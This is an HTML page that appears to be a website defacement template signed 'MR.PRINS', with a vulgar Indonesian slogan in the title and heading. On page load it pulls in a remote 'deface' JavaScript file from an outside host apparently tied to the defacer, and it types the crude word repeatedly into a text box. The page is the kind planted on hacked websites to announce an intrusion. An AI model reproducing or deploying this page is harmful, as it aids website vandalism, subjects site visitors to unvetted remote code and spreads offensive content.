<html>
<head>
<title>SUDAHKAH COLI HARI INI...?</title>
<link rel="icon" type="image/jpg" sizes="32x32" href="https://i.postimg.cc/ZK26TtrV/image-2024-04-03-T20-05-50-637-Z.png">
<link rel="icon" type="image/jpg" sizes="16x16" href="https://i.postimg.cc/ZK26TtrV/image-2024-04-03-T20-05-50-637-Z.png">
</body>
<style>
body {
  background: url(https://i.imgur.com/XYQAAEN.jpg) no-repeat center center fixed;
  -webkit-background-size: cover;
  -moz-background-size: cover;
  -o-background-size: cover;
  background-size: cover;
  color: rgb(255, 255, 255);
}
.twitter a{
  text-decoration: none;
  font-family: Arial, sans-serif  ;
  font-size: 50px;
  text-shadow: grey 0px 0px 10px;
}
 
 
}</style>
<body onload="type_text()" alink="#000000" bgcolor="#000000" vlink="#000000" link="#c0c0c0" text="#000000">
    <div align="center">
    <script type="application/javascript" src="https://nathanprinsley-files.prinsh.com/data-1/js/deface(27-01).js"></script>
    <script language="Javascript"><!--
    var tl=new Array(
    
    "   ",
    "   COLI - COLI - COLI - COLI - COLI - COLI - COLI - COLI - COLI - COLI - COLI",
    "   ",
    "   COLI - COLI - COLI - COLI - COLI - COLI - COLI - COLI - COLI - COLI - COLI",
    "   ",
    "   COLI - COLI - COLI - COLI - COLI - COLI - COLI - COLI - COLI - COLI - COLI",
    "   ",
    "   COLI - COLI - COLI - COLI - COLI - COLI - COLI - COLI - COLI - COLI - COLI",
    "   "
    
    );
    var speed=50;
    var index=0; text_pos=0;
    var str_length=tl[0].length;
    var contents, row;
    </script>
    
    <style type="text/css">BODY {
        SCROLLBAR-FACE-COLOR: #000000; SCROLLBAR-HIGHLIGHT-COLOR: #000000; SCROLLBAR-SHADOW-COLOR: #000000; SCROLLBAR-BASE-COLOR: #000000
    }
    </style>
    
    <style fprolloverstyle="">
    TEXTAREA {
        BORDER-LEFT-COLOR: #000000; BACKGROUND: #000000; BORDER-BOTTOM-COLOR: #000000; FONT: 12px Verdana, Verdana, Verdana, Verdana; COLOR: #d3d3d3; BORDER-TOP-COLOR: #000000; BORDER-RIGHT-COLOR: #000000
    }
    </style>
    
    <h1><font color="#FF0000" face="Caurier" size="12">SUDAH COLI HARI INI?</font></h1>
    <form><font color="#ff0000">
        <textarea rows="15" cols="90" readonly="readonly"></textarea> 
    </font></form>
    <br/><font color="grey" size=1 face="Verdana, Arial, Helvetica, sans-serif"><MR.PRINS></font> 
    </div>
    </body>
